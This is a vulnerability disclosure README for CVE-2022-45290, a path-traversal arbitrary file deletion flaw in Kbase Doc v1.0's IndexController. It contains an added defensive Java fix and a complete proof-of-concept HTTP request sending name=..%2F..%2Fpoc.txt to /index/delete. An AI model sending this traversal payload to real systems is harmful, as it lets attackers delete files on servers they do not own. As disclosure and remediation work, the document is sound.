CVE-2022-45290: KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability/README.md at main · HH1F/KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability
Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java.
**KbaseDoc V1.0 has an arbitrary file deletion vulnerability**

**Description:**

Kbase Doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java
Source code download address: https://github.com/ekoz/kbase-doc
Version: 1.0
Vulnerability analysis:
The vulnerability is located in: src/main/java/com/eastrobot/doc/web/IndexController.java
The POST request handler reads the name parameter. Because the value is not filtered, segments such as ../ can be spliced into the file path, which causes directory traversal. Because the handler performs a deletion, the result is an arbitrary file deletion vulnerability.
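The missing check described above, as an added example (not code from kbase-doc or from this README): one way a delete handler can confine the name parameter to its storage directory. The class and method names and the temporary docs directory are assumptions; the project's controller code is not shown on this page.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.LinkOption;
import java.nio.file.Path;

public class SafeDelete {  // hypothetical class, not part of kbase-doc

    /** Resolve a client-supplied name inside baseDir; throw if it escapes. */
    static Path resolveInside(Path baseDir, String name) throws IOException {
        if (name == null || name.isEmpty()) {
            throw new SecurityException("empty name");
        }
        Path base = baseDir.toRealPath();  // canonical form of the storage root
        Path target;
        try {
            // normalize() collapses "../" segments; an absolute name replaces base
            target = base.resolve(name).normalize();
        } catch (InvalidPathException e) {
            throw new SecurityException("invalid name");
        }
        // startsWith compares whole path elements, not string prefixes
        if (target.equals(base) || !target.startsWith(base)) {
            throw new SecurityException("path escapes base directory: " + name);
        }
        return target;
    }

    /** Delete a regular file under baseDir; directories and symlinks are refused. */
    static boolean deleteUpload(Path baseDir, String name) throws IOException {
        Path target = resolveInside(baseDir, name);
        if (!Files.isRegularFile(target, LinkOption.NOFOLLOW_LINKS)) {
            return false;
        }
        return Files.deleteIfExists(target);
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample layout: <tmp>/docs/report.docx and <tmp>/poc.txt
        Path root = Files.createTempDirectory("kbase-demo");
        Path base = Files.createDirectory(root.resolve("docs"));
        Files.createFile(base.resolve("report.docx"));
        Path outside = Files.createFile(root.resolve("poc.txt"));

        System.out.println("in-tree delete: " + deleteUpload(base, "report.docx"));
        try {
            deleteUpload(base, "../poc.txt");  // decoded form of a traversal value
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("outside file still exists: " + Files.exists(outside));
    }
}
```

The check only inspects the final path component for symlinks; a storage directory that can contain attacker-created symlinked subdirectories also needs the resolved parent verified with toRealPath().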
Reproduction of the vulnerability
Download the source code and build the local environment.
Create a poc.txt file in the kbase-doc-master\target\classes directory.
Use burpsuite to construct the following request.
[+] POC:
```
POST /index/delete HTTP/1.1
Host: test:8081
Content-Length: 22
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: close

name=..%2F..%2Fpoc.txt
```
It is found that poc.txt is deleted.